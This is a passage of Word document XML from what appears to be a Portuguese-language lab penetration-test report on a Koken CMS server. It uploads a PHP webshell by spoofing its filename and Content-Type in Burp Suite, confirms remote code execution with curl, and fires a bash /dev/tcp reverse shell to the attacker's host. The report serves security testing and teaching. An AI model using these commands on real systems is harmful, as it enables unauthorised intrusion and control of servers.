    <w:p w14:paraId="5E535D24" w14:textId="278C3B21" w:rsidR="0008596B" w:rsidRDefault="00000000" w:rsidP="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">O arquivo foi nomeado </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, contendo um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> simples que aceita comandos via parâmetro GET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AEFF4" w14:textId="16FE0D84" w:rsidR="0008596B" w:rsidRPr="0008596B" w:rsidRDefault="0008596B" w:rsidP="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0008596B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58AD44F2" wp14:editId="2440A1EE">
            <wp:extent cx="5579745" cy="3145790"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="694409296"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9745" cy="3145790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D6537" w14:textId="77777777" w:rsidR="0008596B" w:rsidRPr="0008596B" w:rsidRDefault="0008596B" w:rsidP="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46125149" w14:textId="77777777" w:rsidR="0008596B" w:rsidRDefault="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258778FD" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.2 Interceptação com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5939362C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi configurado como proxy intermediário entre o navegador Firefox e o servidor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (proxy em 127.0.0.1:8080). Com o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Intercept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ativado, foi iniciado o processo de upload de uma imagem JPEG qualquer através da interface Library do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E01748" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A requisição POST interceptada foi modificada antes do envio ao servidor, alterando o campo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> da requisição </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>multipart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>form-data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de asdefrghjklçmn.jpeg para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, e substituindo os bytes binários da imagem pelo conteúdo do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PHP. O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi mantido como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/jpeg para enganar a validação superficial do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E9E67E" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A requisição modificada foi encaminhada ao servidor com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, e o arquivo foi aceito e armazenado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408469B6" w14:textId="43BECCE3" w:rsidR="0008596B" w:rsidRPr="0008596B" w:rsidRDefault="0008596B" w:rsidP="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0008596B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C58B7A" wp14:editId="229AB5E4">
            <wp:extent cx="5579745" cy="3134360"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="926576277"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9745" cy="3134360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27979273" w14:textId="04A20952" w:rsidR="0008596B" w:rsidRPr="0008596B" w:rsidRDefault="0008596B" w:rsidP="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0008596B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56E1982B" wp14:editId="43DD79E9">
            <wp:extent cx="5579745" cy="3134360"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="1279448582"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9745" cy="3134360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="525BB201" w14:textId="77777777" w:rsidR="0008596B" w:rsidRDefault="0008596B">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3C589A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.3 Localização do Arquivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uploadado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F1FDAD9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O caminho real do arquivo foi obtido consultando a API interna do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B7493" w14:textId="6F4626DB" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="0008596B" w:rsidRPr="00275305">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://192.168.56.102:8000/api.php?/content/last</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008596B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53F8A7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A resposta JSON confirmou o path: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>storage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>originals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/79/65/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C7702EC" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Confirmação de Remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7F2ED" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A execução remota de código foi confirmada acessando o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> com um comando simples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EF23C0" w14:textId="2CFBABDC" w:rsidR="00DA7219" w:rsidRPr="00BC1FC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl "http://192.168.56.102:8000/storage/originals/</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>06</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/webshell.php?cmd=id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B3252" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A resposta obtida foi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06066F20" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00BC1FC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=33(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-data) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=33(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-data) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>groups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=33(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1D180" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O servidor estava executando código PHP enviado externamente como o usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-data, confirmando o Remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (RCE) com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552F0227" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724B80D" w14:textId="4353CA09" w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8" w:rsidRDefault="00000000" w:rsidP="00BC1FC8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com o RCE confirmado, foi estabelecido um canal de comunicação reverso (reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) entre o servidor comprometido e a máquina atacante. Um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi aberto na Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8">
        <w:t>, e o</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FC8">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FC8">
        <w:t xml:space="preserve"> de reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FC8">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FC8">
        <w:t xml:space="preserve"> foi disparado via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FC8">
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FC8">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8">
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "http://192.168.56.102:8000/storage/originals/79/65/webshell.php?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D3D9B" w14:textId="00EBD9ED" w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8" w:rsidRDefault="00BC1FC8" w:rsidP="00BC1FC8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=bash+-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c+'bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+&gt;%26+/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/192.168.56.101/4444+0&gt;%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>261'"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC1FC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5878485F" wp14:editId="561BBB43">
            <wp:extent cx="5579745" cy="6481445"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1351373417"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6481445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A13C02" w14:textId="74B115A8" w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8" w:rsidRDefault="00BC1FC8" w:rsidP="00BC1FC8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0772662B" w14:textId="667A7BC7" w:rsidR="00DA7219" w:rsidRPr="00BC1FC8" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25CF083B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
